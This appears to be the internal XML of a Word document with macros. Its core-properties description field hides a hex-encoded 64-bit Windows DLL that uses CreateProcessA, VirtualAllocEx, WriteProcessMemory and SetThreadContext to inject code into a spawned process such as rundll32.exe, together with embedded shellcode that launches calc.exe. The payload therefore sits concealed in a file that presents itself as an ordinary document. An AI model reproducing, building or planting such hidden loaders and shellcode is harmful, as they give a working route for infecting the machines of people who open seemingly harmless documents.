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9E488B4" w14:textId="77777777" w:rsidR="00C2723B" w:rsidRDefault="00C2723B">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00C2723B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1276"/>
    <w:rsid w:val="000B2F99"/>
    <w:rsid w:val="000D1655"/>
    <w:rsid w:val="00104322"/>
    <w:rsid w:val="001120ED"/>
    <w:rsid w:val="00352530"/>
    <w:rsid w:val="00632E11"/>
    <w:rsid w:val="008C4E0A"/>
    <w:rsid w:val="00A33081"/>
    <w:rsid w:val="00AF1276"/>
    <w:rsid w:val="00C2723B"/>
    <w:rsid w:val="00C9200E"/>
    <w:rsid w:val="00DB4BD5"/>
    <w:rsid w:val="00F759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620DD1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BD8E3283-A1D9-479F-A37D-2737138D3A5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632E1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2E1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2E11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2E1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2E11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32E1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32E11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EXEC" wne:name="Project.NewMacros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046A4E-014B-4460-817B-B421DDB232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Aryan</dc:creator>
  <cp:keywords/>
  <dc:description>4D|5A|90|00|03|00|00|00|04|00|00|00|FF|FF|00|00|B8|00|00|00|00|00|00|00|40|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|D0|00|00|00|0E|1F|BA|0E|00|B4|09|CD|21|B8|01|4C|CD|21|54|68|69|73|20|70|72|6F|67|72|61|6D|20|63|61|6E|6E|6F|74|20|62|65|20|72|75|6E|20|69|6E|20|44|4F|53|20|6D|6F|64|65|2E|0D|0D|0A|24|00|00|00|00|00|00|00|79|1A|42|C0|3D|7B|2C|93|3D|7B|2C|93|3D|7B|2C|93|E0|84|E7|93|3E|7B|2C|93|3D|7B|2D|93|35|7B|2C|93|30|29|CC|93|3C|7B|2C|93|30|29|F2|93|3C|7B|2C|93|52|69|63|68|3D|7B|2C|93|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|50|45|00|00|64|86|04|00|1B|09|0D|53|00|00|00|00|00|00|00|00|F0|00|22|20|0B|02|0C|00|00|02|00|00|00|0E|00|00|00|00|00|00|B0|11|00|00|00|10|00|00|00|00|00|80|01|00|00|00|00|10|00|00|00|02|00|00|06|00|00|00|00|00|00|00|06|00|00|00|00|00|00|00|00|50|00|00|00|04|00|00|00|00|00|00|02|00|60|01|00|00|10|00|00|00|00|00|00|10|00|00|00|00|00|00|00|00|10|00|00|00|00|00|00|10|00|00|00|00|00|00|00|00|00|00|10|00|00|00|00|00|00|00|00|00|00|00|60|20|00|00|28|00|00|00|00|00|00|00|00|00|00|00|00|40|00|00|24|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|20|00|00|48|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|2E|74|65|78|74|00|00|00|E2|01|00|00|00|10|00|00|00|02|00|00|00|04|00|00|00|00|00|00|00|00|00|00|00|00|00|00|20|00|00|60|2E|72|64|61|74|61|00|00|6C|01|00|00|00|20|00|00|00|02|00|00|00|06|00|00|00|00|00|00|00|00|00|00|00|00|00|00|40|00|00|40|2E|64|61|74|61|00|00|00|0D|08|00|00|00|30|00|00|00|0A|00|00|00|08|00|00|00|00|00|00|00|00|00|00|00|00|00|00|40|00|00|C0|2E|70|64|61|74|61|00|00|24|00|00|00|00|40|00|00|00|02|00|00|00|12|00|00|00|00|00|00|00|00|00|00|00|00|00|00|40|00|00|40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48|89|54|24|10|48|89|4C|24|08|48|83|EC|18|48|8B|44|24|20|48|89|44|24|08|48|C7|04|24|00|00|00|00|48|C7|04|24|00|00|00|00|EB|0B|48|8B|04|24|48|FF|C0|48|89|04|24|48|8B|44|24|28|48|39|04|24|73|17|48|8B|44|24|08|C6|00|00|48|8B|44|24|08|48|FF|C0|48|89|44|24|08|EB|D3|48|83|C4|18|C3|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|48|81|EC|B8|05|00|00|BA|68|00|00|00|48|8D|4C|24|70|E8|7A|FF|FF|FF|C7|44|24|70|68|00|00|00|48|8D|44|24|58|48|89|44|24|48|48|8D|44|24|70|48|89|44|24|40|48|C7|44|24|38|00|00|00|00|48|C7|44|24|30|00|00|00|00|C7|44|24|28|44|00|00|00|C7|44|24|20|00|00|00|00|45|33|C9|45|33|C0|48|8D|15|2F|27|00|00|33|C9|FF|15|3F|0F|00|00|85|C0|0F|84|AB|00|00|00|C7|84|24|10|01|00|00|03|00|10|00|48|8D|94|24|E0|00|00|00|48|8B|4C|24|60|FF|15|21|0F|00|00|C7|44|24|20|40|00|00|00|41|B9|00|10|00|00|41|B8|00|08|00|00|33|D2|48|8B|4C|24|58|FF|15|10|0F|00|00|48|89|44|24|50|48|C7|44|24|20|00|00|00|00|41|B9|00|08|00|00|4C|8D|05|C5|1E|00|00|48|8B|54|24|50|48|8B|4C|24|58|FF|15|ED|0E|00|00|48|8B|44|24|50|48|89|84|24|D8|01|00|00|48|8D|94|24|E0|00|00|00|48|8B|4C|24|60|FF|15|BD|0E|00|00|48|8B|4C|24|60|FF|15|9A|0E|00|00|48|8B|4C|24|60|FF|15|7F|0E|00|00|48|8B|4C|24|58|FF|15|74|0E|00|00|33|C9|FF|15|74|0E|00|00|48|81|C4|B8|05|00|00|C3|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|CC|4C|89|44|24|18|89|54|24|10|48|89|4C|24|08|48|83|EC|38|8B|44|24|48|89|44|24|20|83|7C|24|20|01|74|02|EB|05|E8|98|FE|FF|FF|B8|01|00|00|00|48|83|C4|38|C3|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|D0|20|00|00|00|00|00|00|DE|20|00|00|00|00|00|00|EC|20|00|00|00|00|00|00|FC|20|00|00|00|00|00|00|0E|21|00|00|00|00|00|00|22|21|00|00|00|00|00|00|36|21|00|00|00|00|00|00|48|21|00|00|00|00|00|00|00|00|00|00|00|00|00|00|01|0E|01|00|0E|22|00|00|01|07|02|00|07|01|B7|00|01|12|01|00|12|62|00|00|88|20|00|00|00|00|00|00|00|00|00|00|5E|21|00|00|00|20|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|00|D0|20|00|00|00|00|00|00|DE|20|00|00|00|00|00|00|EC|20|00|00|00|00|00|00|FC|20|00|00|00|00|00|00|0E|21|00|00|00|00|00|00|22|21|00|00|00|00|00|00|36|21|00|00|00|00|00|00|48|21|00|00|00|00|00|00|00|00|00|00|00|00|00|00|7F|00|43|6C|6F|73|65|48|61|6E|64|6C|65|00|58|01|45|78|69|74|54|68|72|65|61|64|00|00|AB|04|52|65|73|75|6D|65|54|68|72|65|61|64|00|00|D7|00|43|72|65|61|74|65|50|72|6F|63|65|73|73|41|00|00|EB|02|47|65|74|54|68|72|65|61|64|43|6F|6E|74|65|78|74|00|00|38|05|53|65|74|54|68|72|65|61|64|43|6F|6E|74|65|78|74|00|00|AA|05|56|69|72|74|75|61|6C|41|6C|6C|6F|63|45|78|00|00|F8|05|57|72|69|74|65|50|72|6F|63|65|73|73|4D|65|6D|6F|72|79|00|00|4B|45|52|4E|45|4C|33|32|2E|64|6C|6C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FC|48|83|E4|F0|E8|C0|00|00|00|41|51|41|50|52|51|56|48|31|D2|65|48|8B|52|60|48|8B|52|18|48|8B|52|20|48|8B|72|50|48|0F|B7|4A|4A|4D|31|C9|48|31|C0|AC|3C|61|7C|02|2C|20|41|C1|C9|0D|41|01|C1|E2|ED|52|41|51|48|8B|52|20|8B|42|3C|48|01|D0|8B|80|88|00|00|00|48|85|C0|74|67|48|01|D0|50|8B|48|18|44|8B|40|20|49|01|D0|E3|56|48|FF|C9|41|8B|34|88|48|01|D6|4D|31|C9|48|31|C0|AC|41|C1|C9|0D|41|01|C1|38|E0|75|F1|4C|03|4C|24|08|45|39|D1|75|D8|58|44|8B|40|24|49|01|D0|66|41|8B|0C|48|44|8B|40|1C|49|01|D0|41|8B|04|88|48|01|D0|41|58|41|58|5E|59|5A|41|58|41|59|41|5A|48|83|EC|20|41|52|FF|E0|58|41|59|5A|48|8B|12|E9|57|FF|FF|FF|5D|48|BA|01|00|00|00|00|00|00|00|48|8D|8D|01|01|00|00|41|BA|31|8B|6F|87|FF|D5|BB|F0|B5|A2|56|41|BA|A6|95|BD|9D|FF|D5|48|83|C4|28|3C|06|7C|0A|80|FB|E0|75|05|BB|47|13|72|6F|6A|00|59|41|89|DA|FF|D5|63|61|6C|63|2E|65|78|65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72|75|6E|64|6C|6C|33|32|2E|65|78|65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10|00|00|5C|10|00|00|48|20|00|00|70|10|00|00|9C|11|00|00|50|20|00|00|B0|11|00|00|E2|11|00|00|58|20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|00</dc:description>
  <cp:lastModifiedBy>Aryan</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-24T18:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-11T12:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>